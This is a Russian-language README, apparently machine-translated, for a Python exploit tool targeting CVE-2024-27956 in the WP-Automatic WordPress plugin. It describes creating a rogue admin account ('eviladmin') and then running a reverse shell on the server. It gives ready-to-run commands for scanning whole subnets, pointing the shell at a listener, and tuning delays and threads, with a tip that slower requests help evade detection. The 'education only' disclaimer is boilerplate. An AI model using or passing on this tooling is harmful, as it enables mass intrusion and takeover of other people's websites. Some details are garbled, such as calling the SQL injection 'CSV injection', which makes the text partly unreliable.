WordPress Auto Admin Account and Reverse Shell cve 2024 27956

Этот скрипт Python автоматизирует процесс создания новой учетной записи администратора на сайте WordPress и выполнения обратной оболочки на целевом сервере. В нем используется уязвимость CSV-инъекции CSV WP-Automatic для выполнения запросов SQL в базе данных WordPress и получения административного доступа.

• Вот несколько более продвинутых примеров того, как вы можете использовать сценарий, предполагая, что у вас есть надлежащее разрешение на проверку целевых систем.

1. Сканирование подсети : если вы хотите отсканировать подсеть для уязвимых установок WordPress, вы можете использовать опцию --subnet . Например:

    python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
   

   Эта команда сканирует подсеть 192.168.1.0/24 для сайтов WordPress с уязвимым автоматическим плагином WP и попытается использовать их с помощью предоставленных настройки слушателя.

2. Настройка задержки : задержка между запросами может быть скорректирована с помощью опции --delay . Более высокая задержка может помочь избежать обнаружения или ограничения скорости, в то время как более низкая задержка может ускорить процесс эксплуатации. Например:

    python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
   

   Эта команда будет использовать задержку 2,5 секунды между запросами.

3. Использование удаленного слушателя : если ваш слушатель настроен на удаленной машине, вы можете указать его IP -адрес и порт, используя параметры --lhost и --lport . Например:

    python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
   

   Эта команда подключится к слушателю на 192.168.1.100:8080 .

4. Увеличение количества потоков : вы можете увеличить количество потоков, используемых сценарием с помощью опции --threads . Это может ускорить процесс эксплуатации, но также может повысить вероятность обнаружения или вызвать проблемы с ограничением скорости. Например:

    python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
   

   Эта команда будет использовать 20 потоков для эксплуатации.

• Python 3.x
• requests библиотеки (установка через pip install requests )
• Netcat (для настройки слушателя для подключения к обратной оболочке)

1. Замените переменную domain в сценарии на URL -адрес целевого сайта WordPress.
2. Запустите сценарий Python.
3. Как только скрипт будет выполнен, он создаст нового пользователя администратора с именем eviladmin , установит пароль и назначит административные привилегии.
4. Затем он загрузит и выполнит обратную полезную нагрузку на целевом сервере.
5. Установите слушатель Netcat, чтобы подключиться к обратной оболочке с помощью указанного порта.

ПРИМЕЧАНИЕ. Убедитесь, что у вас есть надлежащее разрешение и разрешения перед выполнением этого сценария, поскольку он может привести к уязвимости безопасности и юридическим последствиям, если он используется.

Этот сценарий предоставляется только для образовательных и тестирования. Автор не несет ответственности за какое -либо несанкционированное или незаконное использование этого сценария. Используйте его на свой собственный риск.